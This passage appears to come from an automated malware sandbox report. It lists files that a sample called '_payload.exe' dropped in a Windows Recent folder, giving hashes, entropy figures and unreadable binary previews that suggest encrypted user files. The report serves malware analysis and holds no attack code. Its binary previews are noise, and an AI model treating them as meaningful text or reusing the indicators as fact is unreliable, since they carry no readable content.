                                                                                                                          Preview:MVLAM...0...W..["..v..n..fb&x1.Q2..c...(+9.WRM=...atx...1..>.^.+.p|!5...`b....E.9.63N?..ya.YK........H.P.q..@vZ..q......LGX..y.=Y...%~......bp...N.0......4..u..QoOR...0...G.(..g... ..C.}"....!.Rlp,.0.\O.......#.Ac,/$J.x.^Zj.....z.r.......fa[..U..~`.z..l..t.........~..*.`1~Z.H..z..=.I.@y&........>..)?YxVT...X0_|..\.(.0."...o..........;.6....l8)..........R.../.L...QN...UEJ.5t.$...y3..B......EZ,=Y.{.,.6.....X.'...c......i.K..{....p1...={..o....C..r:A.JB...9...O......WMhQe...0#.\..MQ.MgV&gq...\.$.......w...f...be...E...1.R...U.?...8.MT...aV.8D.?...<c...8.......}s.....V<yp..RLK.......&..Rxw7k....H..7.(.X>..o..+.'..l....P.^dA....NB.............P....R.t8...L}.vXk........)LEw..!....l-...e.BN.D..N...B..tGqtX.....'....I....g.....K..2..sd....@T^a\9.MI.X.%%Y.,... 2.}].j&d......u/{.J....h...u.t..........`.....j...(.......4.p..D..~.A.FG^.L...X..Re@...W`.k~z|j....J.X7..!mw.*.rX....t.00\Q.j.lM..W...B...XV\.u1.b.X.y.N#)...T.....)..=..._....g.]T......?....

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NIKHQAIQAU.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8567417291450035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ia0+6AQ+0MzPBThhEgceuMHz53dbvYvFmT3MjfXVzBfQiN6d7bD:j07tO1X5HtVymgbt+/D
                                                                                                                          MD5:97D0B8BC4047D0D9105C5F37F33281FC
                                                                                                                          SHA1:D5574257E08E7AA03D33D643782A22E034516227
                                                                                                                          SHA-256:FDF7412DF2AFE60204FC40E9980B4364F23AD99E805392BB7BD492DE23EF55C1
                                                                                                                          SHA-512:B9272F74FDE078979F2E1279929BB66FDAB91337ACA7A1E8AA6731DEC8007362D821CF79AB51A27767EF7E72057873B07E356DBEE747826CE2F2B1DB256C1F59
                                                                                                                          Malicious:false
                                                                                                                          Preview:NIKHQ...9.Zs.D....l|y.5:.](..L.V....E...uTQ.....$N.H.Yi.. '.....bW.uw......J...n..|0.-{P~aj.....9.uri3+...[.1..S.,..C]!3....0_.`......J...I....^..SY.......p=. ..C[.#>.S..~ ~..;........D......'.=%.H.[.M..Cz2..cP.eU..$a6.$.S.v..Ez....YR....L&Z1..1...&hn........ .r..F..3k..r....2s+.Q)...Dt..`c.z..3&a.%f...#>...F..AW..4j.......p.|5..mAk..Fj..},..fB......u..}.Z.q...*j.C9_.'.FT....^d..w.X..y.@.1....:..6.\..7..m#;j.q..J.L.@.........K&Q....Mpk$.(.;Vh..A.2...).....^..V.".4.l..I.M.a..&..X....,?...9.........u}pn?.L.r..k.8P...&l.......D}s.....V.7..N.}_./.r.B6aV...f.vq&...X.+d$...W...u~...........}e..u>....'...h.-75|...U.....C.....Sc...F..\..,%z' .....Z.#..@.=4.....=...o...Y...Q._z.........!.W4...|.uI..6. ..C....*.W...;..T.VdZ...... s2....gxDi{B.Za....`=..C...N........Q._...y5u.N\.C.6L.;..Q"..w..!.....H..0n...d..j.D).e.W#NZl..).;..X.Y:3.\.........D......q..i..Vb"...:.+. .....C.}21*.Q.I..L..L..T.>B...SM..@..Z.n.........k....s.-.C.4W.\.Mg..&j..Z..

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWTVCDUMOB.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.842203580111211
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:mIvV3FXncxRpeHnzECZ/AZpB3EQtypyyP4fr7TKAUdbbD:mSxJTRATB3EQwUo4jPU1D
                                                                                                                          MD5:15B8998D8944780F8277696FF094DEA0
                                                                                                                          SHA1:A6134FC7980F0CDAD25894FC392AB1758C9CBBC9
                                                                                                                          SHA-256:24FDD04202E7D628DB8392566882E6C72F4C0A1291DAA3BE39D5A10E2B5C3465
                                                                                                                          SHA-512:57E9D308409630556FD58C49B33D01925A179D8866B1F362C1F4D11E63840D463D41764E29FCB7A4C876FD7976DB92979347EC7CBEF05582A975E84BE65EE563
                                                                                                                          Malicious:false
                                                                                                                          Preview:NWTVC..........R..[...D7.).u.........B.....$.........G....k.}....4x.l...O3.$.b....}9........<(p.E..+q..wry..(...s....V..zE..u.....0B...qV..6P.....HC..F)2...5..[.EX.....R...1.s..r*.U......o]7".GAs...;..i.a.1ct..j.:...3..zl.g6Unj) ..U...e.....,.$.W"...$1....C..xh..K)..../a..L.^:y.........;...J9.*]...5g.++.!.UDR7..b.BC..K...*z...`6q....4...H/.,.Z.........]#..$.R..,....../uD4;../.`.....*.]..11.[....D[.B/ 1\.*.c.^.o..A.q,."$3..c.f{X.......zY..U..%q6.U.*....u...F...Y..horM.(.{..Vbph.(..&D{#D...+...S.......%.60......&.;.R.Y...d..GAf..+.|.h.8/.6....A...y....T...R.SOi|....d.G.....w..`.......'g8.y.......p..G3.5F...j.I2xN......@.nT...a..k..i...b..(d.Y.t_.q..Y. ...J.......>....S..\e4O.m....=......`t,....N.L...s(o..W.R...2..F.-.f.u.8.....6Fq.^*.^r.qtk.H....@Cr..|..E.......y.3...g.l..m3..U...T..rNG...T......u`Y.3.k.ua.:~_.[.>.4.R.......EK.$: o.9..7.pyrM.<R.....~=.%..u..:...w.z..TD.P".U...k).7c1...s..T.&..K ..'x..c........(....4c...i.....m^..F..4.....

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWTVCDUMOB.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.858644395249906
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jGwaf2oyIZw3YD57vwCilDaDDqAxUHsF14r5mueLyBgYbtDl4Y4HpMHJL9mTB+6u:y9y8D57vwCioDC24r57eLmCYeMHxYg5f
                                                                                                                          MD5:72D08E8DA7A6423AFDCD351B6D564C5B
                                                                                                                          SHA1:0F404AF39DE830EA60A0D250BA3DB77F6826F908
                                                                                                                          SHA-256:F05F3EDB6E9B938B2A9FA812941347B08914D588F37CC48AEC4BDEBBB55B1F82
                                                                                                                          SHA-512:44EE6A32C43889C925A3E431211B8AA20B5CF58802A2030DE552D8BB021D24CB0846F143E3A4FDA3042CC6823B294628912661FA51B8407E921B3175C3A26790
                                                                                                                          Malicious:false
                                                                                                                          Preview:NWTVCM..Ket..'.,#...T.{C`.m.@]..*...lzj.r_...-.......t..Z4.l.t..'/u.la..dr.......e$......v6w.Wy.tM....a.......E.9.X..K....<...$........8..#Zp{.C.c..p...2...iR1cQ+H.{.7Z...7...[....b....Y..S.7l(.Jv.....&j.y5'o2l.7r.....Z.qO.z0........G.R.a...g..:|.(..7.j...@.0.$.X.........d....qt.'.....*....(.O.mC...&..YZ.4...c.B..c..'.h~.o.D....U...s..+..bm..*n..(.6..%,..,>M..M.4._#.!..r..=..|cR......P9.....N....B...z...7.Z. (.....Xf|..|:y.....S... l...1.I.X........H].+....a..Ly+.. .c...kR.N.xg/...$dw..?.U.H...y...T.7..5.;..+A..9v.....?.-OH......`Caz..0...5;...^y.# ...........ri........P.6..4..}.w.3........^...s......6._...Tw0....r..E......u.i...e...ri....Bn\7..k_e;7....B.\V.!.J....D.K....LW..q.+8...y...cH.7.bj\!.k..!.@..{bT...#.j....;.ps.?.C..z...>.v.....G...jm[U.....J..t....AC... .>%.yX.K. N.#.<$.{..?...=}.7K6...7;.{A(#.;i......W.].<.M...b.C.....U&4..6.q....."a.b.B........+.|......Zm1.7.I...w..%.b>...I._.&..e.h."...d9x...i.z..O..c.S..~....s>.>2...

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ONBQCLYSPU.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.873474589347564
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3vqWx/vXdkks8whtKZ2YMNipfy+811WpkUrXRXnZS1Lq58HoNkOD+fsbD:/qWxXdkku9YMc1yQpdzVmS+SkOD+uD
                                                                                                                          MD5:7CAA297B394BFEF0C4778ECC246BEEC7
                                                                                                                          SHA1:C1905FC1DC4E8154A9809B157929985D0AD43D49
                                                                                                                          SHA-256:45DDE0C4391F04C49E6E5340535AA07551E367E0A144545897DD1D6659293943
                                                                                                                          SHA-512:80061DA9F831AA0F961B6FC72D31E30D54119CD8A78508ED11B83ECC0A5FCF400CF691F78E4F59B4654F3C20E1C3AB29F8D70F9AB706A921737EAD64C0C15C54
                                                                                                                          Malicious:false
                                                                                                                          Preview:ONBQC.UGS....oC.h......_.g...#.n...B..q.#..... ..J...p..."1^z.9.YF.....M..o..,4hW.^.Pl...X..;..%.mY...M...N...i...F|.t...... .\I...M...|.....x9\......].....C.....y77...s.(0.b...{e..20......v..........H;..........c6W.M..;....z...t..\.y. .`...C..|..mx.>d..L.Q..j5TT..(...F..QgN.\4.S...{T......n....DU.+.....*..~...X-p.F.`2.......S.X.Xp3.^l.Z.....S......7I..E.Y...G.>..eN..p..JJ.cw..8..9..M..WyI...u.............qNo4CgSn..L.94....."..^=..x....&.v.8.u+....U.;.$..J.+...734.....*~Sp.V..Uq.3{.q.H..>..w...C.ge.@#....R..jr{.DJ.v..w.l...x..Z{....%._.<~ tAR.>3..6c.7..D..go...<z..T.......).......6>:..Z./,..:/......L.N'.PH.8.h.d..[.:.f...yQ*L...{.kd)..7]U..@\o..py.~.w-oP...#A.=:.K).pt.T).RQt.@..6.'.P...............S.*....,..9.@....o....%."..+....w....qi(`..P.L..\v.C.q>..b.P.......Gs...f...L\....3..$......=.."T....Wg....Q.g..B+..w .o}.).(7.0.(q".......x..b..1..c.<..G4L..m..>..np0Jt%..~....5C.f..Q.o.qu#....as.%V...:?.......]..,..I...HmO..S.n.E...

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ONBQCLYSPU.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.861083318791211
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:xNjDGeOZuVizA9rduKoMd3S5KwzT5g1eRajq84IvMAbycSF8qvY4zuXDhG4quvfo:fvlOZuIA9RuMd3Gnf0yEv/AF8qvY/XDA
                                                                                                                          MD5:FDA62E903D7D2088DD5C33509430C54C
                                                                                                                          SHA1:B23E30D45F8144113E4DF9AAE17471EC5F132375
                                                                                                                          SHA-256:DBE7F0CB3A7D7508EB07822FF6B28EECEC9A9DE1F09B40A0AE5DF44EDC7B780D
                                                                                                                          SHA-512:4A263405540A90AB4E76AFFD77B4461B3E71870BA83F30B382ED864ACDB3D5DFA430C27E6D05DA9D7FD8F2FC898D8C49A9F8E5CD4D2CF1C3FDD2E938773ABF59
                                                                                                                          Malicious:false
                                                                                                                          Preview:ONBQC.b%F..,..y...@..0.-.{M.....m.k.i...]....x1.....|...8h5T.7. mIOHe}..k.z.....o..2,..,.....|Z.-T/..z..kQm.o.jlh.....c.3Frg,.~.H.e..E.qQ.QS.=B.Gx....).VJ.FV..........b....J.%....A.....G.Lp...O`.M.....p...`...F A....W......qs.DJ-.....%......]5.s..sm....0...+B........u...q....p.^..{a&.8..J...L...g.W.G.V}..TG.....#..2.C..K.......x..i......8..1.jG....l..O...J.t..P..#...-s2iTkO...B.oY...o.R.".&..@..:....(..i.X(....'....3......Q$..r...<?.....q.^.`C.3...Z..G.n\.R..>6...).....`..U......#9...iB.N.cg...FDo...>e.B...C..1.s..g...n.5...@..}a.....y. l.D.d...u.g..}.8p.'o.'..O.......r..%.......6...f.I*.,*. d+...=Y..)x.....hxv..;.8.g.....6..@n...Hi7B.._V...!.P.g a.C].a"w.0 ..Dr..}.R.hE/..n....d....."3Gk......*u....[....z..r...........P...W8....~ux.....t.zHZ.09A..}.&...G.o......G.S.~.(...C<D....5..2....L.h,...qf...`...,...m}*.,NO.._rL+QE.. ..U..A&a..tp.J.YH.v~..>{...m.....:.8..B7.z4.Ec......)......N.....,.>..J..f.C....G.q#k.Il..".Q...9.t

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.842723804546775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jXYuEFD+BVBpUpmTKpAc8TY1nO7KzUkwOTCp7AFoYBZpZYbD:spFDABImhcL1uKzTrTCpIYD
                                                                                                                          MD5:11BBDBEE05A68A8BF5E40CA4A87310AD
                                                                                                                          SHA1:4876072CC3E4E35B98C854507F1D89D69C76EA28
                                                                                                                          SHA-256:64A8761CFEEC38FF20B4777A822F53A59098BEF31D2A25FAE8B4E9E9DA6A4157
                                                                                                                          SHA-512:729B9BF89AFFFCDE7E1CB63AD2BFBD3A9D22E29AF7634887AC880011E8B6AB73D503D09E424F2DE560FD9CDBD56092A759DA0B48B0DE1CE6CC7AE13133E52791
                                                                                                                          Malicious:false
                                                                                                                          Preview:PIVFA/q#.}1....J....3...,....../..(.....K....r6...V....J...o.l......7Sn9..E+...g3......b.5...p@j.6Pa..SH|.z.25Hn..V&Jt..it7 .^..........-.....%...nI+.jG.1.....a.n.......k....W;h......9hR..b..I#..v.7...R.1.....F.`h.._u].....@x..u.y......%...].\.p.u3.a.O......D.1b-.Iv..7...4^.'._...y.Tg....[.s...A....,2.z},.jz....bp.b.l..*4pIXFQ,...`T..ZQ\,tF....4?...0...^l.\..-O&M3.......F^....M....z.m.$..4...9..q...za~%....Y4N.p..\.&...._(.g../..7a.mpJ|#.....G.e`d...w@.^|.N_..\...iRgn...Xu,.ZG..X..x.+..0.KyT...3W+...!...g%..I..J..6,i\.O..N;......E*B......n..`.9I.;.n..E....+O...a... ,T..k......y.B...c..`H..^....\...tFGO..[...M..'.xtg.6+_...Y.c2H.....+...............zI...l....hFI.XS......5&.~.J..4.....IO.b.:E.....9.+1.z1>..0...[\3....<.;..8;WBq.~..'..lcVWq../..2...Y....w....]......u....u:!."a.,.....K3.aAU;..^...L.s.A\...|...T.l......hw.P..=Im....e...nj.....G.|.......IZY.s.."%>T.........."e5..r..T.....m[...fSp[...i....F.....B.X. =..<V.S...S.xrJ.g.0..7.(+

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856100572604738
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:l/hZcEsbehIMzI5o5J3H4+iQQDNrYgmMPRM4td3DMFKWjjr4JJKMsbD:l/hZcdiGII+JorY4Rrtd3DMtjjr4JJr+
                                                                                                                          MD5:58F81380D34B78091BA2646EC1D42F15
                                                                                                                          SHA1:ECC1BACD797B735B6B28E627AAC7B1EE8FFD15FF
                                                                                                                          SHA-256:57A1F9213E5F20AD31450BED7027863EC0D4A7FC9BB8CC15F643238135B6B9D7
                                                                                                                          SHA-512:D12E15A58462CF425408560C97A77C91DD3B49D4BA38DF04FB6097EB58F65DE14061FA4BA6C96B38C066F67DFFC9FCD4258A2AB0FA09779B6BBC6AB78ACC5D20
                                                                                                                          Malicious:false
                                                                                                                          Preview:PIVFA...{.....%.Cf....}.E.R..v.....C{.om..."...&/z...8....w~....A...:kg....*d....g.....{..\I.&..Kk.i.+......3.!....H#<.>.+>.y...dtPDm.b.g........C*.........7...u...:Z.P."'B=I*.....i....C?.4.Z....~...)..XS..E.P.....>.../[&V.8....~|3.fF.p....&D4..?.......e.K.2..c.....3.JD.l....\g.........i..c(.{..J.X.x..B.QJZ.k]N.(. P...QY^....L#P.t......../....h.MDV.R.)..0...k$_.J..../3.D*.....h....e..|A.Y...Xi..V6A..?.Q........f...1...........c].~..A.D.7.Sh./..q.f..2/.S..-o.[.o{l...01._V....Yd..[..b.....`.?..inW.m/.x..;8...|...o............. .!........F.k&..W.~......).aw9?....&R........a..]..............[...1.[\,...k.!BB....d...BL.Z.....G..J.)...N..O.~.}....T.....o..(...........:..f..X.e..MP.Z.....I......m.>.......n..\.0.Z..........I...../.._.".....}..A.x....}..'.....z...A...%.....V..=0...q4.....J#-.."....yS.....\#J..)D...R)`.V..I.y....6....n.@..g.q...TG.n..].......!.....6..:.....!.^k...S.....L....Z&..d.r.."Y......0;..f.5..7...".7...)/zA..

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845394653863646
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4eVLFxvKwc/NXjrEDLsxswvD21Pz+YaG4nZ+hieETHBVE6bD:FxvKJ/NXjrEna2t+YckcRTHo4D
                                                                                                                          MD5:73B8B1CE3EF597E08AFFE5790CE34142
                                                                                                                          SHA1:3F7BD9F59BAC46D56C2EFF86935B218787F5BBFE
                                                                                                                          SHA-256:D6123AF4A2153B3E64A77EA7B082222A17B8770A76F1D1180856825F86969C04
                                                                                                                          SHA-512:C58D9DDBCF941B4C4DEF7AF4BF931FA0E72C0158887AAD6FA952A86C0F7C10CE9ADDDD0B8285860458A0F8EED0F42C2740A1594AFC1EB93CDD1B3D355B2AB62E
                                                                                                                          Malicious:false
                                                                                                                          Preview:PIVFA.....8...E0...(....z...OO.[f......5.K.......(...Ht{q.o.8...#....z..$...rvDS .p..)...m....5.?fr.M...($F..]'..'..24.l.<....a/v.d<@..`.4.t{H..Y.....yp.ygwf.......Nkg.vD.T...N..,.'..D........=....9..,.Wb..B.s..'.5.".L..m...Z'15ET.h.%7.. a..msA..-rB........u:...U...De..QSe....k...0Pr.Z..;.T.+..aL.m.XAr...........0.......H..zM..m%..d.9.....{.sU..h..<.N.(..-..4...1.!..y..g&2.X|c.Lb'...o{..I@.#..(.F...S...7.. .G_BE...g......S.$.4.Z.2.D..&..Hz....tZ.I^A#ny..i...^."ZS..l.t......-..M..........I....]}....<.d..u.D.$U.F.N.....3s.&.J.N..H..b.l".....q^.d...BU....?4X...z...kK.m/....Lv ....$.w.(A...vD....p...\..X$2...g.=a....e.h.W('...q..A.LQ.v....J....a....I...o~o.{..HJf....."..;.m.fjv&4c...sX.{.......^.b..U2....-<)e.y...=&.4...7....yu".%>N..J..@......va..B1..#,Yo...~..LZ....>...1h.3ree.S...|........a}~..4K9...z...t.....,...'."y...,....E$5.......5x................v.....87M.*.Rk...0]..Jn.......1n........_E..I>..Rhs.3 .c............(k...\..l....l`cGS...NF.....D..

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.818301734245135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:QCUiQq40v6kSw/YfNNIEN8WS/NyEdU2Dv2l+x+ObD:QCBS13Iy8PNyEdU2c+x+sD
                                                                                                                          MD5:F2094078BB780EAD363A1DC56FB636B5
                                                                                                                          SHA1:5DE505F00BEF3529F656D3AD75880E018EE0F210
                                                                                                                          SHA-256:1C244B1B6743B4D799BBF442D231B8240747732E9A84AB4763C547C1D390A7EF
                                                                                                                          SHA-512:7361F15DC12EA23F917D60CDE24D5EAA98D9678C19CC0B8CC4DF150140AF6308A1A79ADECC47101C2D4F39226225DDF38E3C7994874A2E9A4E517652D1729EF6
                                                                                                                          Malicious:false
                                                                                                                          Preview:QCOIL.=*s"-.....!=.-r........@z.r..6.._R.."XG.'.....[..(./......-. .p......s7{.nN.+..bt...MJ..4...r:{]....4....Qa..3g..}.........&4:.........../...x.5.=.&..9.O}.J..&.........1....Z.....#....L. .P:wQX.R.......A5Q"J..v.|..M....,.c....C.O.....}9Ln...R7e.._.y5..8u...S.r.O..t.r0...F.2..E<>W...3.ovo..u.....P%A.wb....b..l:.&.%.=...0oi.:.e`...a.>.bN...<...,K=....,.PEwp.Q.AX............j.S..k.a......4..x....}..^I...Q.c1K,b.8.^.v../..{.t..a.T.......9%..._4.7...u.,.T.I..$.U..b:<......l..c.LE.Q..p...-.i...Z...3......&.F.g.'\.b&=8.T..U"...r3C..]V.:..Z"6.I...D...........Ve.>K....~.D.ZUp=..p.U.x.VA.a..P...K.<n..pv...Vq....2M...K.f[.$H.%..{...<Z.=&.A.....Mf.K.H6a.Ar7.Xe..:..|r.3.Z+..JR.)$.no..<.2.#.s..,.r....X.7..4......c3.}(Y.......q......\.3.....(.X4..H...G .y.....m...v.X.......@!a.y~S..I9.........M......."..4..,.#....8....g..8HFS?.t....El.`.t.)dQ.....V..E^.7..I......._....y.u....P^.7O.........u...V..=.M..o..X.#.u\q..}/S..9....[cZ{MC'........BU...h....-..p......

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.874235139494236
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Xmhz7hY2vPNrc7/qN9cxFz4TPWgMzqm1KNGbD:Xmhz/xc7iN6FUTPzMemfD
                                                                                                                          MD5:DD62A453E557FE66A50032B84560BB07
                                                                                                                          SHA1:2B402C2E58EBB7AB73FCB66657A7199200B2749C
                                                                                                                          SHA-256:75B7B01E33864C9AECC4E41EC2A9367E14ACB286F6FB37DA0F9E27D0ED46A745
                                                                                                                          SHA-512:4C02E0E64FF0B151423D8FA77B5D83136E11C9F99D48770EB4DDC6AD38E18D4988AEA18A9D0A1EF189342577DD3F0EC29DB4B60AF30779D29BDF31423CD35BE4
                                                                                                                          Malicious:false
                                                                                                                          Preview:QCOIL0...E#.....~..YN..k...q;'...(:1........ ...].q..F..G(.x~.\4./(...P..:...,].....V.CA.m..c...<.W.{.fo....B+..6....._B5..<....A........R.k...].h.....)J1.+.7... ....V.6..8 ..5.?.kK.Y.8...O...pso..'iJ.t..*..S....p.m...dG\Z.lW....'H.X^.`...z....1n=...,y...D....3).....!...3H..a.p\o`..E*;.g..=3....I<.....k.....(..z.[s..+/..4..>..a.W.#.GGk|.Oa.c..sY?.;F..w..w.......B^..*...l...9.}....$..g....{48=Z.V`..YR83...K..I..+....9.*.z.:\.y.n...C.eHf!..hR..-.p.P...$_..2..H.....rn.~.yRw....3s._HC.....Z......D...1 h...V.ZD..l....l!.TD.l....2..6..}.b...X.:%.......(JG..p.tk.......[../nU|......n.LI<.."u.C.(...7...}...I...HM.U..:..m.j...jA2|.)5..6~g.........3:...sc4.O..1..\"o..D...E.r...2..-Z\/z...{....[.b....T.....N........,....xK...T.Q....<.....q..e.{........!ri.#....w..N...o.h.Hf.F.:lu......`D....D....{..&.s...O.w.uTb.BE.....z..f.=...{h..}).bA.~....:..t.0...l.{..~f.#.C;...:.C._...J......f....&F..wL:*...z@.}.....w3...]p.|.eWA.....6...7?P.._.m.'..3.d

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.83968472722018
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:gmDKF/HIkTiytuWtAm8pAgpyxZXulhz015ZcnqgjRAjm7YJEGlwbD:gP/HIii6rAbfMg2Z+q2RAGYE7D
                                                                                                                          MD5:C52DE7915E5110461132BB21558B6FCB
                                                                                                                          SHA1:0D163E6F0DFF4ED37167AFBEB88B67A57C6E64A0
                                                                                                                          SHA-256:05CC9025193644877A58D8DCB9FE7033FFF919AB64398A6F95B83F73F0C91E6F
                                                                                                                          SHA-512:12975B6D90070035B41884C8651DF1E9DEBE2C19EF3D9D19BDE2C948969DEA45212B29C86845ABEA52BE3FF70BFB413F96B3509CC276E8AE0E252DD6697204BB
                                                                                                                          Malicious:false
                                                                                                                          Preview:QCOILIQ.1h....^...e....n@._.\.R.3..........<.N..;o.1.;.....9.%4.\.Z.W.Ev:.`..[...".....F.1....~..,z``._..A.\..wZ.8.I..cfY..4..CD..+....uQl...Qz.gP(S.2...$.i.c...Q..r.l.wy+.....$sb..` 3.........Y}.N.'....J..A...C7.V_w[l#. "."enc..I.mt...y...?..xt0)s.n6L..../u....,fBtP,....}......U..H...Z..>..@......H.@.....Z"il._r.dZ.4j..U.#....B ..........V...G..]....WX...y6}M.....5#...5Sko...b..pg*5..c|.n.....W..I..i.k.+..a.a%pA....-.`:`O8.}lL.n.9G..Q.HV!gj....Wy.0......+v.Q._;.8....y..."`..Y..>?...c..p.L.~LS...B+..YHW@g./,.8..........v?Z./.i....g\Fd........o.{fx{o../&)....n.{.:..x.&.dIl{)q....5.rH,D..F..,J`T....u.^y...d..D....s.....m.........A./...0...t.[8p......7L.rV.3..2...8.f...!.aX..SYfFcb.....P..kwc5.P.a...5f&.Tg...\.K..K..#f. m._./..1..z].....L.KS.R.....j.v.Q...R..m...S%.*....P.s.6w.J......n.....E.~.%..wA#..D..k....%..f...*#.2J.Jt...;u...Gmc.uw...0.;..Bs...e....z+.R.w..U.3..z.|..05.R..K.!..Rx.PY...gF.......Z..UP..L.c.;a..Rz.F......_F2a.<r:.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UMMBDNEQBN.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.843766902753094
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:o6WcUohSLov2Lp3A7yC5ROaCPZ19h3NZ6o/BpRM9NJ4g/xLLfVaigLktbD:o6WcU/L1AWC/OaYfNtBpRSTLfMiSiD
                                                                                                                          MD5:4A2E206EF66967C372424524B6A7568C
                                                                                                                          SHA1:2B4AAB91BA72DBEC1DE44CE78955E4D174DBE1CC
                                                                                                                          SHA-256:DFDA7EEEBD4CB03CD48EE93DE0BC2F362469C306DDA93D149BC389801C6A0C17
                                                                                                                          SHA-512:5E2870FF53569D6A04B9F77226CF4EB891D8B5CBC5786DC453053F731909B4E33568149DDC9B598AB8FB1FDFB07C2A2A77C8BFB9536141B89F7A9C61A3C4F004
                                                                                                                          Malicious:false
